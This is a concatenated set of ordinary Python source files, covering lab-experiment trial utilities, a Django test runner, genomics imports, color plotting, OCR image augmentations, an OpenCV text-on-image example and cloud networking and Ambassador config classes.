super(Trial, self).__init__(*args, **kwargs)
self.label = 'trial'
self.session = None
self.index = index
self.type_ = type_
self.stimulus = None
self.class_ = class_
self.response = None
self.correct = None
self.rt = None
self.reward = False
self.punish = False
self.events = []
self.stim_event = None
class Command(object):
"""
Enables to run subprocess commands in a different thread with TIMEOUT option.
via https://gist.github.com/kirpit/1306188
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
if isinstance(command, str):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
""" Run a command then return: (status, output, error). """
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
def parse_commandline(arg_str=sys.argv[1:]):
""" parse command line arguments
note: optparse is depreciated w/ v2.7 in favor of argparse
"""
parser = ArgumentParser()
parser.add_argument('-B', '--box',
action='store', type=int, dest='box', required=False,
help='(int) box identifier')
parser.add_argument('-S', '--subject',
action='store', type=str, dest='subj', required=False,
help='subject ID and folder name')
parser.add_argument('-c', '--config',
action='store', type=str, dest='config_file', default='config.json', required=True,
help='configuration file [default: %(default)s]')
args = parser.parse_args(arg_str)
return vars(args)
def check_cmdline_params(parameters, cmd_line):
# if someone is using red bands they should ammend the checks I perform here
allchars = string.maketrans('', '')
nodigs = allchars.translate(allchars, string.digits)
if not ('box' not in cmd_line or cmd_line['box'] == int(
parameters['panel_name'].encode('ascii', 'ignore').translate(allchars, nodigs))):
print("box number doesn't match config and command line")
return False
if not ('subj' not in cmd_line or
int(cmd_line['subj'].encode('ascii', 'ignore').translate(allchars, nodigs)) == int(
parameters['subject'].encode('ascii', 'ignore').translate(allchars, nodigs))):
print("subject number doesn't match config and command line")
return False
return True
def time_in_range(start, end, x):
"""Return true if x is in the range [start, end]"""
if start <= end:
return start <= x <= end
else:
return start <= x or x <= end
def is_day(city='Boston', lat='42.41', lon='-71.13'):
# def is_day((latitude, longitude) = ('32.82', '-117.14')):
# latitude='42.41', longitude='-71.13' for Medford, MA
# #Tuples not supported in Python 3, rewrote to separate tuples as this function is only called
# without parameters anyway (1/17/18 AR)
"""Is it daytime?
parameter: city, valid entries are large world cities (best option is to select your nearest large city
alternative is lat and lon of current location
Returns True if it is daytime
* Discovered by the Germans in 1904, they named it San Diego,
which of course in German means a whale's vagina. (Burgundy, 2004)
"""
import ephem
if city:
# print 'city'
try:
obs = ephem.city(city.capitalize())
except KeyError:
raise NoCityMatchError
except AttributeError:
obs = ephem.city(city.get('city').capitalize()) # 3/12/19 (AR) Does this work? There's no 'get' function
# for a str
elif lat and lon:
# print 'coords'
obs = ephem.Observer()
obs.lat = str(lat)
obs.long = str(lon)
else:
# print 'else'
obs = ephem.city('Boston')
next_sunrise = ephem.localtime(obs.next_rising(ephem.Sun()))
next_sunset = ephem.localtime(obs.next_setting(ephem.Sun()))
return next_sunset < next_sunrise
def check_time(schedule, fmt="%H:%M", **kwargs):
""" Determine whether current time is within $schedule
Primary use: determine whether trials should be done given the current time and light schedule or session schedule
returns Boolean if current time meets schedule
schedule='sun' will change lights according to local sunrise and sunset
schedule=[('07:00','17:00')] will have lights on between 7am and 5pm
schedule=[('06:00','12:00'),('18:00','24:00')] will have lights on between
"""
if schedule == 'sun':
if is_day(kwargs):
return True
else:
for epoch in schedule:
assert len(epoch) is 2
now = dt.datetime.time(dt.datetime.now())
start = dt.datetime.time(dt.datetime.strptime(epoch[0], fmt))
end = dt.datetime.time(dt.datetime.strptime(epoch[1], fmt))
if time_in_range(start, end, now):
return True
return False
def check_day(schedule):
""" determine whether trials should be done given the current day
"""
today = dt.datetime.today().weekday()
if schedule == 'weekday':
if today < 5: # .weekday() returns int of day of week, with Monday = 0
return True
else:
return False
elif schedule == 'daily':
return True
else: # Match current day of week to session_days parameter
todayDate = dt.datetime.today()
for eachDay in schedule:
if eachDay == today or eachDay == todayDate.strftime("%A").lower() or \
eachDay == todayDate.strftime("%a").lower():
return True
return False
def wait(secs=1.0, final_countdown=0.0, waitfunc=None):
"""Smartly wait for a given time period.
secs -- total time to wait in seconds
final_countdown -- time at end of secs to wait and constantly poll the clock
waitfunc -- optional function to run in a loop during hogCPUperiod
If secs=1.0 and final_countdown=0.2 then for 0.8s python's time.sleep function will be used,
which is not especially precise, but allows the cpu to perform housekeeping. In
the final hogCPUsecs the more precise method of constantly polling the clock
is used for greater precision.
"""
# initial relaxed period, using sleep (better for system resources etc)
if secs > final_countdown:
time.sleep(secs - final_countdown)
secs = final_countdown # only this much is now left
# It's the Final Countdown!!
# hog the cpu, checking time
t0 = time.time()
while (time.time() - t0) < secs:
# let's see if any events were collected in meantime
try:
waitfunc()
except:
pass
def auditory_stim_from_wav(wav):
with closing(wave.open(wav, 'rb')) as wf:
(nchannels, sampwidth, framerate, nframes, comptype, compname) = wf.getparams()
duration = float(nframes) / sampwidth
duration = duration * 2.0 / framerate
stim = AuditoryStimulus(time=0.0,
duration=duration,
name=wav,
label='wav',
description='',
file_origin=wav,
annotations={'nchannels': nchannels,
'sampwidth': sampwidth,
'framerate': framerate,
'nframes': nframes,
'comptype': comptype,
'compname': compname,
}
)
return stim
def concat_wav(input_file_list, output_filename='concat.wav'):
""" concat a set of wav files into a single wav file and return the output filename
takes in a tuple list of files and duration of pause after the file
input_file_list = [
('a.wav', 0.1),
('b.wav', 0.09),
('c.wav', 0.0),
]
returns a list of AuditoryStimulus objects
TODO: add checks for sampling rate, number of channels, etc.
"""
cursor = 0
epochs = [] # list of file epochs
audio_data = ''
with closing(wave.open(output_filename, 'wb')) as output:
for input_filename, isi in input_file_list:
# read in the wav file
with closing(wave.open(input_filename, 'rb')) as wav_part:
try:
params = wav_part.getparams()
output.setparams(params)
fs = output.getframerate()
except: # TODO: what was I trying to except here? be more specific
params = []
fs = 1
pass
audio_frames = wav_part.readframes(wav_part.getnframes())
# append the audio data
audio_data += audio_frames
part_start = cursor
part_dur = len(audio_frames) / params[1]
epochs.append(AuditoryStimulus(time=float(part_start) / fs,
duration=float(part_dur) / fs,
name=input_filename,
file_origin=input_filename,
annotations=params,
label='motif'
))
cursor += part_dur # move cursor length of the duration
# add isi
if isi > 0.0:
isi_frames = ''.join([struct.pack('h', fr) for fr in [0] * int(fs * isi)])
audio_data += isi_frames
cursor += len(isi_frames) / params[1]
# concat all of the audio together and write to file
output.writeframes(audio_data)
description = 'concatenated on-the-fly'
concat_wav = AuditoryStimulus(time=0.0,
duration=epochs[-1].time + epochs[-1].duration,
name=output_filename,
label='wav',
description=description,
file_origin=output_filename,
annotations=output.getparams(),
)
return concat_wav, epochs
def get_num_open_fds():
"""
return the number of open file descriptors for current process
.. warning: will only work on UNIX-like os-es.
"""
pid = os.getpid()
procs = subprocess.check_output(
["lsof", '-w', '-Ff', "-p", str(pid)])
nprocs = len(
filter(
lambda s: s and s[0] == 'f' and s[1:].isdigit(),
procs.split('\n'))
)
return nprocs
def rand_from_log_shape_dist(alpha=10):
"""
randomly samples from a distribution between 0 and 1 with pdf shaped like the log function
low probability of getting close to zero, increasing probability going towards 1
alpha determines how sharp the curve is, higher alpha, sharper curve.
"""
beta = (alpha + 1) * np.log(alpha + 1) - alpha
t = random.random()
ret = ((beta * t - 1) / (sp.special.lambertw((beta * t - 1) / np.e)) - 1) / alpha
return max(min(np.real(ret), 1), 0)
class NoCityMatchError(Exception):
"""Raised for is_day() when no matching city is found in the ephem module
"""
# print 'No city matches entered text. Try using coords instead (lat=xxx, lon=yyy)'
pass
class VarTypeError(Exception):
"""Raised for is_day() when coords are entered as values
"""
# print 'No city matches entered text. Try using coords instead (lat=xxx, lon=yyy)'
pass
|
the-stack_0_6493 | #! /usr/bin/env python
import sys
import os
from django.conf import settings, global_settings
APP_NAME = 'sitegate'
def main():
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
if not settings.configured:
settings.configure(
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'etc',
APP_NAME,
),
DATABASES={'default': {'ENGINE': 'django.db.backends.sqlite3'}},
MIDDLEWARE_CLASSES=(
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
),
ROOT_URLCONF='sitegate.tests',
MIGRATION_MODULES={
'auth': 'django.contrib.auth.tests.migrations',
},
AUTH_USER_MODEL=os.environ.get('DJANGO_AUTH_USER_MODEL', 'auth.User')
)
try: # Django 1.7 +
from django import setup
setup()
except ImportError:
pass
from django.test.utils import get_runner
runner = get_runner(settings)()
failures = runner.run_tests((APP_NAME,))
sys.exit(failures)
if __name__ == '__main__':
main()
|
the-stack_0_6494 | from .family_methods import trio_matrix, mendel_errors, transmission_disequilibrium_test, de_novo
from .impex import export_elasticsearch, export_gen, export_bgen, export_plink, export_vcf, \
import_locus_intervals, import_bed, import_fam, grep, import_bgen, import_gen, import_table, \
import_plink, read_matrix_table, read_table, get_vcf_metadata, import_vcf, import_gvcfs, \
import_vcfs, index_bgen, import_matrix_table
from .statgen import skat, identity_by_descent, impute_sex, \
genetic_relatedness_matrix, realized_relationship_matrix, pca, \
hwe_normalized_pca, pc_relate, split_multi, filter_alleles, filter_alleles_hts, \
split_multi_hts, balding_nichols_model, ld_prune, row_correlation, ld_matrix, \
linear_mixed_model, linear_regression_rows, logistic_regression_rows, poisson_regression_rows, \
linear_mixed_regression_rows, lambda_gc
from .qc import sample_qc, variant_qc, vep, concordance, nirvana, summarize_variants
from .misc import rename_duplicates, maximal_independent_set, filter_intervals
__all__ = ['trio_matrix',
'linear_mixed_model',
'skat',
'identity_by_descent',
'impute_sex',
'linear_regression_rows',
'logistic_regression_rows',
'poisson_regression_rows',
'linear_mixed_regression_rows',
'lambda_gc',
'sample_qc',
'variant_qc',
'genetic_relatedness_matrix',
'realized_relationship_matrix',
'pca',
'hwe_normalized_pca',
'pc_relate',
'rename_duplicates',
'split_multi',
'split_multi_hts',
'mendel_errors',
'export_elasticsearch',
'export_gen',
'export_bgen',
'export_plink',
'export_vcf',
'vep',
'concordance',
'maximal_independent_set',
'import_locus_intervals',
'import_bed',
'import_fam',
'import_matrix_table',
'nirvana',
'transmission_disequilibrium_test',
'grep',
'import_bgen',
'import_gen',
'import_table',
'import_plink',
'read_matrix_table',
'read_table',
'get_vcf_metadata',
'import_vcf',
'import_vcfs',
'import_gvcfs',
'index_bgen',
'balding_nichols_model',
'ld_prune',
'filter_intervals',
'de_novo',
'filter_alleles',
'filter_alleles_hts',
'summarize_variants',
'row_correlation',
'ld_matrix'
]
|
the-stack_0_6497 | # Copyright 2018 Jose Cambronero and Phillip Stanley-Marbell
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
# ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
from colormath.color_objects import sRGBColor, XYZColor
from colormath.color_conversions import convert_color
from colorsys import hsv_to_rgb
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
import numpy as np
def color_pairs_plot(*args, **kwargs):
"""
Plot swatches of color
:param args: separate rgb channels, 2 lists of rgb tuples, or a list of tuples of rgb tuples
:param kwargs: groups (in order to plot multiple columns of swatchs)
:return:
"""
if len(args) == 6:
return _color_pairs_plot_rgb(*args, **kwargs)
elif len(args) == 2:
return _color_pairs_plot_sep(*args, **kwargs)
else:
return _color_pairs_plot_tupled(*args, **kwargs)
def _color_pairs_plot_rgb(r1, g1, b1, r2, g2, b2, **kwargs):
return _color_pairs_plot_sep(zip(r1, g1, b1), zip(r2, g2, b2), **kwargs)
def _color_pairs_plot_sep(color1, color2, **kwargs):
return _color_pairs_plot_tupled(zip(color1, color2), **kwargs)
def _color_pairs_plot_tupled(rgb_pairs, **kwargs):
groups = kwargs.get('groups', 1)
normalize = kwargs.get('normalize', False)
# check if we should still normalize values
if not normalize:
normalize = max([v > 1 for color1, color2 in rgb_pairs for v in list(color1) + list(color2)])
nrows = len(rgb_pairs)
pairs_per_group = nrows / groups
if 'ax' in kwargs:
ax = kwargs['ax']
fig = ax.get_figure()
else:
fig, ax = plt.subplots()
# dimension info
bbox = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
width, height = bbox.width, bbox.height
X = width * fig.get_dpi()
Y = height * fig.get_dpi()
# space between swatches: arbitrary
swatch_space = 60
# make groups distinguishable
group_space = 0.5 * swatch_space
# we can define X = group_space * (groups - 1) + (swatch_space + 2 * swatch_width) * groups
swatch_width = (X - group_space * (groups - 1) - swatch_space * groups) / (2 * groups)
# offset between groups must consider swatch space etc
group_offset = 2 * swatch_width + swatch_space + group_space
# swatch height
h = Y / (pairs_per_group + 1)
for i, pair in enumerate(rgb_pairs):
# location for this pair on y axis
y = Y - (h * (i % pairs_per_group)) - h
# horizontal offset multipler based on group
group_id = i / pairs_per_group
for j, color in enumerate(pair):
# normalize rgb color to 0.0 to 1.0
if normalize:
color = [ channel / 255.0 for channel in color ]
# left/right swatch
is_second = j % 2
# starting point for this group
xmin = group_id * group_offset
# if it is the second swatch, we move a bit to the right
xmin += is_second * (swatch_width + swatch_space)
# max is simply the swatch width added to the start of the swatch
xmax = xmin + swatch_width
ax.hlines(y=y + h * 0.1, xmin= xmin, xmax=xmax, color=color, linewidth=h * 0.6)
# add an arrow
if j == 0:
ax.arrow(xmax + 10, y + h * 0.1, swatch_space * 0.5, 0, head_width = 8, width = 4, shape = 'full')
ax.set_axis_off()
return ax
def smash(x, min_v = 0.0, max_v = 1.0):
if x < min_v:
return min_v
elif x > max_v:
return max_v
else:
return x
def plot_along_hue(hues, y, ax = None, normalize = False, **kwargs):
# normalize x coordinates
if normalize or max(map(lambda x: x > 1.0, hues)):
hues = [h / 360.0 for h in hues]
# create "fake" HSV color with full saturation and value, but same hue as point
hsv_colors = [(h, 1, 1) for h in hues]
# convert color to rgb to actually color points in graph
rgb_colors = [hsv_to_rgb(*col) for col in hsv_colors]
# there may be some smudge, so anything outside of range gets put back into range
rgb_colors = [(smash(r), smash(g), smash(b)) for r, g, b in rgb_colors]
if ax is None:
fig, ax = plt.subplots()
ax.scatter(x = hues, y = y, c = rgb_colors, alpha = 1.0, s = 100, **kwargs)
return ax
# plots the spectral locus and then overlays colors as points by projecting into x,y
def chromaticity_scatter(colors, cs = None, marker = '*', converter = lambda x: convert_color(sRGBColor(*x), XYZColor), ax = None, **kwargs):
# plot basic background if not provided
if ax == None:
ax = _spectral_locus()
# convert every color to XYZ
XYZ = map(converter, colors)
# now convert every XYZ to x,y pairs
# check if we can iterate over points
try:
map(lambda x: x, XYZ[0])
except:
XYZ = map(lambda x: x.get_value_tuple(), XYZ)
xyz = [map(lambda x: x / sum(pt), pt) for pt in XYZ]
xs,ys,_ = zip(*xyz)
# create group colors if provided else sets to red
if not cs:
cs = 'red'
cmap = None
else:
cmap = plt.get_cmap('jet', len(cs))
cmap.set_under('gray')
ax.scatter(x = xs, y = ys, s = 100, c = cs, marker = marker, cmap = cmap, **kwargs)
return ax
def _spectral_locus():
# TODO we should just pickle xs, ys below
locus_pts_file = os.path.join(os.path.dirname(__file__), '../resources/spectral-locus.csv')
xs = []
ys = []
for line in open(locus_pts_file, "r"):
_, Xstr, Ystr, Zstr = line.split(",")
# convert from XYZ to x,y
XYZ = [ float(coord) for coord in [Xstr, Ystr, Zstr]]
denom = sum(XYZ)
xs.append(XYZ[0] / denom)
ys.append(XYZ[1] / denom)
fig, ax = plt.subplots()
poly = Polygon(np.array(zip(xs, ys)), fill = False, closed= True)
ax.add_patch(poly)
return ax
def plot_svd(m, xdim = 0, ydim = 1, colors = None, ax = None, title = "SVD plot", pct_var = True):
"""
Compute the SVD of a matrix and plot in 2-d as a scatter plot
:param m: matrix to decompose
:param xdim: vector of U to use as x axis
:param ydim: vector of U to use as y axis
:param colors: optional color mapping for each point
:param ax: optional existing axes
:param title: optional title
:param pct_var: if true returns the % of variance explained by the eigenvalues associated with xdim and ydim
:return: scatter plot and potentially % of variance explained by dimensions used
"""
if xdim < 0 or ydim < 0 or xdim == ydim:
raise ValueError("Must be valid 2-d for plotting")
u, s, v = np.linalg.svd(m)
if colors is None:
cmap = plt.get_cmap('jet')
else:
colors = np.array(colors)
cmap = plt.get_cmap('jet', len(colors))
cmap.set_under('gray')
if ax is None:
ax = plt.subplot()
ax.scatter(x=u[:, 0], y=u[:, 1], c = colors, cmap = cmap, label = "Group %s" )
ax.set_xlabel("U[:][%d]" % xdim)
ax.set_ylabel("U[:][%d]" % ydim)
ax.legend(loc = 'best')
ax.set_title(title)
if pct_var:
return ax, sum(s[[xdim, ydim]]) / sum(s)
else:
return ax
|
the-stack_0_6498 | import sys
sys.path.insert(0, 'augraphy')
import augraphy
import torchvision.transforms as transforms
import random
import torch
import numpy as np
import logging
import cv2
from albumentations import augmentations
from PIL import Image, ImageFilter
from augmixations.blots import HandWrittenBlot
from warp_mls import WarpMLS
logger = logging.getLogger(__name__)
class Paperize(object):
def __init__(self, process_datasets=None, p=0.5):
self.process_datasets = process_datasets or []
paper_phase = [
augraphy.PaperFactory(texture_path='augraphy/paper_textures/', p=1.),
augraphy.BrightnessTexturize(range=(0.8, 1.), deviation=0.05, p=0.5),
]
post_phase = [
augraphy.BookBinding(radius_range=(1, 10), curve_intensity_range=(0, 20), p=0.25),
augraphy.Brightness(range=(0.5, 1.), p=0.25),
augraphy.Gamma(range=(0.3, 1.8), p=0.25),
augraphy.LightingGradient(p=0.25),
]
self.pipeline = augraphy.AugraphyPipeline(ink_phase=[], paper_phase=paper_phase, post_phase=post_phase)
self.p = p
def __call__(self, inputs):
if not isinstance(inputs, (tuple, list)):
return inputs
image, dataset = inputs
if dataset not in self.process_datasets or random.random() < self.p:
return image
np_image = np.array(image)
np_image = self.mask_background(np_image)
if np_image.shape[0] >= 30 and np_image.shape[1] >= 30:
try:
np_image = self.pipeline.augment(np_image)['output']
except Exception as e:
logger.info(e)
image = Image.fromarray(np_image)
return image
@staticmethod
def mask_background(image):
original_image = image.copy()
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
image = cv2.bitwise_not(image)
kernel = np.ones((15, 15), np.uint8)
image = cv2.dilate(image, kernel, iterations=2)
gray_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
image = gray_image & image
original_image[np.where(image == 0)] = 0
return original_image
class NumpyAugmentation(object):
def __call__(self, image):
np_image = np.array(image)
np_image = self.forward(np_image)
return Image.fromarray(np_image)
def forward(self, np_image):
raise NotImplementedError
class ResizePad(NumpyAugmentation):
def __init__(self, width, height):
self.width = int(width)
self.height = int(height)
self.ratio = int(width / height)
def forward(self, img):
h, w, _ = img.shape
ratio = w / h
if ratio < self.ratio:
padding = np.zeros((h, self.ratio * h - w, 3), dtype=np.uint8)
img = cv2.hconcat([img, padding])
elif ratio > self.ratio:
padding = np.zeros((w // self.ratio - h, w, 3), dtype=np.uint8)
img = cv2.vconcat([img, padding])
img = cv2.resize(img, (self.width, self.height))
return img.astype(np.uint8)
class WeightedRandomChoice:
def __init__(self, trans, weights=None):
self.trans = trans
if not weights:
self.weights = [1] * len(trans)
else:
assert len(trans) == len(weights)
self.weights = weights
def __call__(self, img):
t = random.choices(self.trans, weights=self.weights, k=1)[0]
try:
tfm_img = t(img)
except Exception as e:
logger.warning('Error during data_aug:'+str(e))
return img
return tfm_img
def __repr__(self):
format_string = self.__class__.__name__ + '('
for t in self.transforms:
format_string += '\n'
format_string += ' {0}'.format(t)
format_string += '\n)'
return format_string
class Dilation(torch.nn.Module):
def __init__(self, kernel=3):
super().__init__()
self.kernel=kernel
def forward(self, img):
return img.filter(ImageFilter.MaxFilter(self.kernel))
def __repr__(self):
return self.__class__.__name__ + '(kernel={})'.format(self.kernel)
class Erosion(torch.nn.Module):
def __init__(self, kernel=3):
super().__init__()
self.kernel=kernel
def forward(self, img):
return img.filter(ImageFilter.MinFilter(self.kernel))
def __repr__(self):
return self.__class__.__name__ + '(kernel={})'.format(self.kernel)
class Underline(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, img):
img_np = np.array(img.convert('L'))
black_pixels = np.where(img_np < 50)
try:
y1 = max(black_pixels[0])
x0 = min(black_pixels[1])
x1 = max(black_pixels[1])
except:
return img
for x in range(x0, x1):
for y in range(y1, y1-3, -1):
try:
img.putpixel((x, y), (0, 0, 0))
except:
continue
return img
class KeepOriginal(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, img):
return img
class ToGray(NumpyAugmentation):
def __init__(self):
self.transform = augmentations.transforms.ToGray(always_apply=True)
def forward(self, image):
augmented = self.transform(image=image)
return augmented['image']
class Distort(NumpyAugmentation):
def __init__(self, segment=3):
self.segment = segment
def forward(self, src):
img_h, img_w = src.shape[:2]
cut = img_w // self.segment
thresh = cut // 3
src_pts = list()
dst_pts = list()
src_pts.append([0, 0])
src_pts.append([img_w, 0])
src_pts.append([img_w, img_h])
src_pts.append([0, img_h])
dst_pts.append([np.random.randint(thresh), np.random.randint(thresh)])
dst_pts.append([img_w - np.random.randint(thresh), np.random.randint(thresh)])
dst_pts.append([img_w - np.random.randint(thresh), img_h - np.random.randint(thresh)])
dst_pts.append([np.random.randint(thresh), img_h - np.random.randint(thresh)])
half_thresh = thresh * 0.5
for cut_idx in np.arange(1, self.segment, 1):
src_pts.append([cut * cut_idx, 0])
src_pts.append([cut * cut_idx, img_h])
dst_pts.append([cut * cut_idx + np.random.randint(thresh) - half_thresh,
np.random.randint(thresh) - half_thresh])
dst_pts.append([cut * cut_idx + np.random.randint(thresh) - half_thresh,
img_h + np.random.randint(thresh) - half_thresh])
trans = WarpMLS(src, src_pts, dst_pts, img_w, img_h)
dst = trans.generate()
return dst
class Stretch(NumpyAugmentation):
def __init__(self, segment=4):
self.segment = segment
def forward(self, src):
img_h, img_w = src.shape[:2]
cut = img_w // self.segment
thresh = cut * 4 // 5
src_pts = list()
dst_pts = list()
src_pts.append([0, 0])
src_pts.append([img_w, 0])
src_pts.append([img_w, img_h])
src_pts.append([0, img_h])
dst_pts.append([0, 0])
dst_pts.append([img_w, 0])
dst_pts.append([img_w, img_h])
dst_pts.append([0, img_h])
half_thresh = thresh * 0.5
for cut_idx in np.arange(1, self.segment, 1):
move = np.random.randint(thresh) - half_thresh
src_pts.append([cut * cut_idx, 0])
src_pts.append([cut * cut_idx, img_h])
dst_pts.append([cut * cut_idx + move, 0])
dst_pts.append([cut * cut_idx + move, img_h])
trans = WarpMLS(src, src_pts, dst_pts, img_w, img_h)
dst = trans.generate()
return dst
class Perspective(NumpyAugmentation):
def forward(self, src):
img_h, img_w = src.shape[:2]
thresh = img_h // 2
src_pts = list()
dst_pts = list()
src_pts.append([0, 0])
src_pts.append([img_w, 0])
src_pts.append([img_w, img_h])
src_pts.append([0, img_h])
dst_pts.append([0, np.random.randint(thresh)])
dst_pts.append([img_w, np.random.randint(thresh)])
dst_pts.append([img_w, img_h - np.random.randint(thresh)])
dst_pts.append([0, img_h - np.random.randint(thresh)])
trans = WarpMLS(src, src_pts, dst_pts, img_w, img_h)
dst = trans.generate()
return dst
class Blot(NumpyAugmentation):
def __init__(self, max_count=2):
def get_params(count):
return {
'incline': (-10, 10),
'intensivity': (0.5, 0.9),
'transparency': (0.05, 0.3),
'count': count,
}
self.blots = [HandWrittenBlot(params=get_params(count=i+1)) for i in range(max_count)]
def forward(self, image):
blot = self.blots[random.randint(0, len(self.blots) - 1)]
return blot(image)
class PaperColor(NumpyAugmentation):
def __init__(self):
post_phase = [
augraphy.BookBinding(radius_range=(1, 10), curve_intensity_range=(0, 20), p=0.25),
augraphy.Brightness(range=(0.5, 1.), p=0.25),
augraphy.Gamma(range=(0.3, 1.8), p=0.25),
augraphy.LightingGradient(p=0.25),
]
self.pipeline = augraphy.AugraphyPipeline(ink_phase=[], paper_phase=[], post_phase=post_phase)
def forward(self, np_image):
if np_image.shape[0] >= 30 and np_image.shape[1] >= 30:
try:
np_image = self.pipeline.augment(np_image)['output']
except Exception as e:
logger.info(e)
return np_image
# 0: InterpolationMode.NEAREST,
# 2: InterpolationMode.BILINEAR,
# 3: InterpolationMode.BICUBIC,
# 4: InterpolationMode.BOX,
# 5: InterpolationMode.HAMMING,
# 1: InterpolationMode.LANCZOS,
def build_data_aug(size, mode, preprocess_datasets, resnet=False, resizepad=True,
use_additional_augs=False):
if resnet:
norm_tfm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
else:
norm_tfm = transforms.Normalize(0.5, 0.5)
if resizepad:
resize_tfm = ResizePad(size[0], size[1])
else:
resize_tfm = transforms.Resize(size, interpolation=3)
if mode == 'train':
augmentations = [
# transforms.RandomHorizontalFlip(p=1),
transforms.RandomRotation(degrees=(-10, 10), expand=True, fill=0),
transforms.GaussianBlur(3),
Dilation(3),
Erosion(3),
Underline(),
KeepOriginal(),
]
if use_additional_augs:
augmentations.extend([
Distort(),
Stretch(),
Perspective(),
Blot(),
PaperColor(),
])
return transforms.Compose([
Paperize(preprocess_datasets),
ToGray(),
WeightedRandomChoice(augmentations),
resize_tfm,
transforms.ToTensor(),
norm_tfm
])
else:
return transforms.Compose([
Paperize(),
ToGray(),
resize_tfm,
transforms.ToTensor(),
norm_tfm
])
if __name__ == '__main__':
tfm = ResizePad()
img = Image.open('temp.jpg')
tfm(img).save('temp2.jpg')
|
the-stack_0_6500 | """
Example to show how to draw basic memes with OpenCV
"""
# Import required packages:
import cv2
import numpy as np
import matplotlib.pyplot as plt
def show_with_matplotlib(img, title):
"""Shows an image using matplotlib capabilities"""
# Convert BGR image to RGB:
img_RGB = img[:, :, ::-1]
# Show the image using matplotlib:
plt.imshow(img_RGB)
plt.title(title)
plt.show()
# Dictionary containing some colors:
colors = {'blue': (255, 0, 0), 'green': (0, 255, 0), 'red': (0, 0, 255), 'yellow': (0, 255, 255),
'magenta': (255, 0, 255), 'cyan': (255, 255, 0), 'white': (255, 255, 255), 'black': (0, 0, 0),
'gray': (125, 125, 125), 'rand': np.random.randint(0, high=256, size=(3,)).tolist(),
'dark_gray': (50, 50, 50), 'light_gray': (220, 220, 220)}
# We load the image 'lenna.png':
image = cv2.imread("lenna.png")
# Write some text (up):
cv2.putText(image, 'Hello World', (10, 30), cv2.FONT_HERSHEY_TRIPLEX, 0.8, colors['green'], 1, cv2.LINE_AA)
# Write some text (down):
cv2.putText(image, 'Goodbye World', (10, 200), cv2.FONT_HERSHEY_TRIPLEX, 0.8, colors['red'], 1, cv2.LINE_AA)
# Show image:
show_with_matplotlib(image, 'very basic meme generator')
|
the-stack_0_6501 | """
Copyright 2014 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.networking.networks.composites import _NetworkingAuthComposite
from cloudcafe.networking.networks.extensions.security_groups_api.behaviors \
import SecurityGroupsBehaviors
from cloudcafe.networking.networks.extensions.security_groups_api.client \
import SecurityGroupsClient
from cloudcafe.networking.networks.extensions.security_groups_api.config \
import SecurityGroupsConfig
class SecurityGroupsComposite(object):
networking_auth_composite = _NetworkingAuthComposite
def __init__(self, auth_composite=None):
auth_composite = auth_composite or self.networking_auth_composite()
self.url = auth_composite.networking_url
self.user = auth_composite._auth_user_config
self.config = SecurityGroupsConfig()
self.client = SecurityGroupsClient(**auth_composite.client_args)
self.behaviors = SecurityGroupsBehaviors(
security_groups_client=self.client,
security_groups_config=self.config)
|
the-stack_0_6503 | from typing import Any, ClassVar, Dict, List, Optional, TYPE_CHECKING
from ..constants import Constants
from ..config import Config
from .irresource import IRResource
from .irhttpmapping import IRHTTPMapping
from .irtls import IRAmbassadorTLS
from .irtlscontext import IRTLSContext
from .ircors import IRCORS
from .irretrypolicy import IRRetryPolicy
from .irbuffer import IRBuffer
from .irgzip import IRGzip
from .irfilter import IRFilter
if TYPE_CHECKING:
from .ir import IR
class IRAmbassador (IRResource):
AModTransparentKeys: ClassVar = [
'admin_port',
'auth_enabled',
'circuit_breakers',
'default_label_domain',
'default_labels',
'diag_port',
'diagnostics',
'enable_ipv6',
'enable_ipv4',
